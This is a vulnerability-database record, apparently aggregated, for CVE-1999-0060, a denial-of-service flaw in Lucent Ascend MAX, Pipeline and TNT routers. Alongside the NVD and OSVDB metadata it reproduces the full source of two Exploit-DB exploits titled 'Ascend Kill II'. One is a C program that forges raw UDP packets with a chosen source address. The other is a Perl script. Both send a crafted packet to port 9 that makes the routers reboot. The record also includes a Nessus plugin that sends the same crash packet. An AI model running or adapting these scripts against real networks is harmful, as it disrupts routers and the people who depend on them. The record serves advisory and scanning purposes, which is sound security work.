ID CVE-1999-0060 Type cve Reporter NVD Modified 2008-09-09T08:33:39
Description
Attackers can cause a denial of service in Ascend MAX and Pipeline routers with a malformed packet to the discard port, which is used by the Java Configurator tool.
{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0060", "history": [], "references": [], "lastseen": "2016-09-03T02:08:10", "bulletinFamily": "NVD", "title": "CVE-1999-0060", "cpe": ["cpe:/h:lucent:ascend_tnt_router:2.0", "cpe:/h:lucent:ascend_max_router:4.0", "cpe:/h:lucent:ascend_pipeline_router:5.0", "cpe:/h:lucent:ascend_max_router:5.0", "cpe:/h:lucent:ascend_max_router:3.0", "cpe:/h:lucent:ascend_max_router:2.0", "cpe:/h:lucent:ascend_pipeline_router:1.0", "cpe:/h:lucent:ascend_pipeline_router:3.0", "cpe:/h:lucent:ascend_pipeline_router:2.0", "cpe:/h:lucent:ascend_pipeline_router:6.0", "cpe:/h:lucent:ascend_max_router:1.0", "cpe:/h:lucent:ascend_tnt_router:1.0", "cpe:/h:lucent:ascend_pipeline_router:4.0"], "viewCount": 5, "id": "CVE-1999-0060", "hash": "418e6fc6456bdb0b66b0f050ba099eac580f4c314c13f0988b8922265f374b34", "description": "Attackers can cause a denial of service in Ascend MAX and Pipeline routers with a malformed packet to the discard port, which is used by the Java Configurator tool.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-1999-0060"], "scanner": [], "modified": "2008-09-09T08:33:39", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "1998-03-16T00:00:00", "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-09-03T02:08:10"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:1112"]}, {"type": "nessus", "idList": ["ASCEND_KILL.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:19554", "EDB-ID:19555"]}], "modified": "2016-09-03T02:08:10"}, "vulnersScore": 5.0}}
{"osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nOther Advisory URL: http://packetstormsecurity.nl/advisories/nai/SNI-26.Ascend.advisory\nKeyword: UDP Port 9\nISS X-Force ID: 889\n[CVE-1999-0060](https://vulners.com/cve/CVE-1999-0060)\nBugtraq ID: 714\n", "modified": "1998-03-16T00:00:00", "published": "1998-03-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1112", "id": "OSVDB:1112", "title": "Ascend MAX / Pipeline Router Discard Port Malformed Packet DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:07:17", "bulletinFamily": "exploit", "description": "Lucent Ascend MAX Router 5.0/Pipeline Router 6.0/TNT Router 1.0/2.0 MAX UDP Port 9 Vulnerability (1). CVE-1999-0060. Remote exploit for hardware platform", "modified": "1998-03-16T00:00:00", "published": "1998-03-16T00:00:00", "id": "EDB-ID:19554", "href": "https://www.exploit-db.com/exploits/19554/", "type": "exploitdb", "title": "Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/714/info\r\n\r\nCertain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. \r\n\r\n /* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.\r\n * see ftp.ascend.com.\r\n */\r\n \r\n /*\r\n * Ascend Kill II - C version\r\n *\r\n * (C) 1998 Rootshell - http://www.rootshell.com/\r\n *\r\n * Released: 3/16/98\r\n *\r\n * Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues\r\n * (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)\r\n *\r\n * Sends a specially constructed UDP packet on the discard port (9)\r\n * which cause Ascend routers to reboot. (Warning! Ascend routers will\r\n * process these if they are broadcast packets.)\r\n *\r\n * Compiled under RedHat 5.0 with glibc.\r\n *\r\n * NOTE: This program is NOT to be used for malicous purposes. This is\r\n * intenteded for educational purposes only. By using this program\r\n * you agree to use this for lawfull purposes ONLY.\r\n *\r\n * It is worth mentioning that Ascend has known about this bug for quite\r\n * some time.\r\n *\r\n * Fix:\r\n *\r\n * Filter inbound UDP on port 9.\r\n *\r\n */\r\n\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <netinet/in.h>\r\n #include <netinet/in_systm.h>\r\n #include <netinet/ip.h>\r\n #include <linux/udp.h>\r\n #include <netdb.h>\r\n\r\n #define err(x) { fprintf(stderr, x); exit(1); }\r\n #define errs(x, y) { fprintf(stderr, x, y); exit(1); }\r\n\r\n /* This magic packet was taken from the Java Configurator */\r\n char ascend_data[] =\r\n {\r\n 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,\r\n 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,\r\n 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,\r\n 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,\r\n 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,\r\n 0x50, 0x41, 0x53, 0x53};\r\n\r\n\r\n unsigned short \r\n in_cksum (addr, len)\r\n u_short *addr;\r\n int len;\r\n {\r\n register int nleft = len;\r\n register u_short *w = addr;\r\n register int sum = 0;\r\n u_short answer = 0;\r\n\r\n while (nleft > 1)\r\n {\r\n sum += *w++;\r\n nleft -= 2;\r\n }\r\n if (nleft == 1)\r\n {\r\n *(u_char *) (&answer) = *(u_char *) w;\r\n sum += answer;\r\n }\r\n\r\n sum = (sum >> 16) + (sum & 0xffff);\r\n sum += (sum >> 16);\r\n answer = ~sum;\r\n return (answer);\r\n }\r\n\r\n int \r\n sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)\r\n struct sockaddr_in *sin;\r\n unsigned short int s, datalen, sport, dport;\r\n unsigned long int saddr, daddr;\r\n char *data;\r\n {\r\n struct iphdr ip;\r\n struct udphdr udp;\r\n static char packet[8192];\r\n char crashme[500];\r\n int i;\r\n\r\n ip.ihl = 5;\r\n ip.version = 4;\r\n ip.tos = rand () % 100;;\r\n ip.tot_len = htons (28 + datalen);\r\n ip.id = htons (31337 + (rand () % 100));\r\n ip.frag_off = 0;\r\n ip.ttl = 255;\r\n ip.protocol = IPPROTO_UDP;\r\n ip.check = 0;\r\n ip.saddr = saddr;\r\n ip.daddr = daddr;\r\n ip.check = in_cksum ((char *) &ip, sizeof (ip));\r\n udp.source = htons (sport);\r\n udp.dest = htons (dport);\r\n udp.len = htons (8 + datalen);\r\n udp.check = (short) 0;\r\n memcpy (packet, (char *) &ip, sizeof (ip));\r\n memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));\r\n memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);\r\n /* Append random garbage to the packet, without this the router\r\n will think this is a valid probe packet and reply. */\r\n for (i = 0; i < 500; i++)\r\n crashme[i] = rand () % 255;\r\n memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);\r\n return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,\r\n (struct sockaddr *) sin, sizeof (struct sockaddr_in)));\r\n }\r\n\r\n unsigned int \r\n lookup (host)\r\n char *host;\r\n {\r\n unsigned int addr;\r\n struct hostent *he;\r\n\r\n addr = inet_addr (host);\r\n if (addr == -1)\r\n {\r\n he = gethostbyname (host);\r\n if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))\r\n return 0;\r\n\r\n bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));\r\n }\r\n return (addr);\r\n }\r\n\r\n void\r\n main (argc, argv)\r\n int argc;\r\n char **argv;\r\n {\r\n unsigned int saddr, daddr;\r\n struct sockaddr_in sin;\r\n int s, i;\r\n\r\n if (argc != 3)\r\n errs (\"Usage: %s <source_addr> <dest_addr>\\n\", argv[0]);\r\n\r\n if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)\r\n err (\"Unable to open raw socket.\\n\");\r\n if (!(saddr = lookup (argv[1])))\r\n err (\"Unable to lookup source address.\\n\");\r\n if (!(daddr = lookup (argv[2])))\r\n err (\"Unable to lookup destination address.\\n\");\r\n sin.sin_family = AF_INET;\r\n sin.sin_port = 9;\r\n sin.sin_addr.s_addr = daddr;\r\n if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)\r\n {\r\n perror (\"sendpkt_udp\");\r\n err (\"Error sending the UDP packet.\\n\");\r\n }\r\n }\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19554/"}, {"lastseen": "2016-02-02T12:07:24", "bulletinFamily": "exploit", "description": "Lucent Ascend MAX Router 5.0/Pipeline Router 6.0/TNT Router 1.0/2.0 MAX UDP Port 9 Vulnerability (2). CVE-1999-0060. Remote exploit for hardware platform", "modified": "1998-03-17T00:00:00", "published": "1998-03-17T00:00:00", "id": "EDB-ID:19555", "href": "https://www.exploit-db.com/exploits/19555/", "type": "exploitdb", "title": "Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/714/info\r\n \r\nCertain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. \r\n\r\n#!/usr/bin/perl\r\n\r\n #\r\n # Ascend Kill II - perl version\r\n # (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>\r\n #\r\n # Released: 3/17/98\r\n #\r\n # Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues\r\n # (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)\r\n #\r\n # NOTE: This program is NOT to be used for malicous purposes. This is\r\n # intenteded for educational purposes only. By using this program\r\n # you agree to use this for lawfull purposes ONLY.\r\n #\r\n #\r\n\r\n use Socket;\r\n\r\n require \"getopts.pl\";\r\n\r\n sub AF_INET {2;}\r\n sub SOCK_DGRAM {2;}\r\n\r\n sub ascend_kill {\r\n $remotehost = shift(@_);\r\n chop($hostname = `hostname`);\r\n $port = 9;\r\n $SIG{'INT'} = 'dokill';\r\n $sockaddr = 'S n a4 x8';\r\n ($pname, $aliases, $proto) = getprotobyname('tcp');\r\n ($pname, $aliases, $port) = getservbyname($port, 'tcp')\r\n unless $port =~ /^\\d+$/;\r\n ($pname, $aliases, $ptype, $len, $thisaddr) =\r\n gethostbyname($hostname);\r\n $this = pack($sockaddr, AF_INET, 0, $thisaddr);\r\n ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);\r\n $that = pack($sockaddr, AF_INET, $port, $thataddr);\r\n socket(S, &AF_INET, &SOCK_DGRAM, 0);\r\n $msg = pack(\"c64\",\r\n 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,\r\n 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,\r\n 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,\r\n 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,\r\n 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,\r\n 0x50, 0x41, 0x53, 0x53);\r\n for ($i=0; $i<500; $i++) {\r\n $msg .= pack(\"c1\", 0xff);\r\n }\r\n send(S,$msg,0,$that) || die \"send:$!\";\r\n }\r\n\r\n if ($ARGV[0] eq '') {\r\n print \"usage: akill2.pl <remote_host>\\n\";\r\n exit;\r\n }\r\n\r\n &ascend_kill($ARGV[0]);\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19555/"}], "nessus": [{"lastseen": "2019-02-21T01:07:37", "bulletinFamily": "scanner", "description": "It was possible to make the remote Ascend router reboot by sending it a UDP packet containg special data on port 9 (discard).\n\nAn attacker may use this flaw to make your router crash continuously, preventing your network from working properly.", "modified": "2018-06-27T00:00:00", "id": "ASCEND_KILL.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10019", "published": "1999-06-22T00:00:00", "title": "Ascend MAX / Pipeline Router Discard Port Malformed Packet DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10019);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-1999-0060\");\n script_bugtraq_id(714);\n\n script_name(english:\"Ascend MAX / Pipeline Router Discard Port Malformed Packet DoS\");\n script_summary(english:\"Crashes an ascend router\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote router is susceptible to a remote denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was possible to make the remote Ascend router reboot by sending it\na UDP packet containg special data on port 9 (discard).\n\nAn attacker may use this flaw to make your router crash continuously,\npreventing your network from working properly.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest router firmware.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1998/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/06/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_KILL_HOST);\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"Denial of Service\");\n script_require_keys(\"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\nif ( TARGET_IS_IPV6 ) exit(0);\n\nstart_denial();\n\ncrash = raw_string(0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4,\n 0x81, 0x00, 0x00, 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff,\n 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41,\n 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50,\n 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57,\n 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53);\n\nport = 9;\nip = forge_ip_packet(ip_hl: 5,\t \tip_v : 4,\tip_tos : 123,\n\t\t ip_len : 80, \tip_id:1234,\tip_off : 0,\n\t\t ip_ttl : 0xff,\tip_p:IPPROTO_UDP,\n\t\t ip_src : this_host());\nudp = forge_udp_packet(ip:ip,\n\t\t\tuh_sport : 9,\n\t\t\tuh_dport : 9,\n\t\t\tuh_ulen : 60,\n\t\t\tdata:crash);\n\nsend_packet(udp, pcap_active:FALSE) x 10;\nsleep(5);\nalive = end_denial();\nif(!alive){\n \t\tsecurity_warning(port:port, protocol:\"udp\");\n\t\tset_kb_item(name:\"Host/dead\", value:TRUE);\n\t\t}\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}
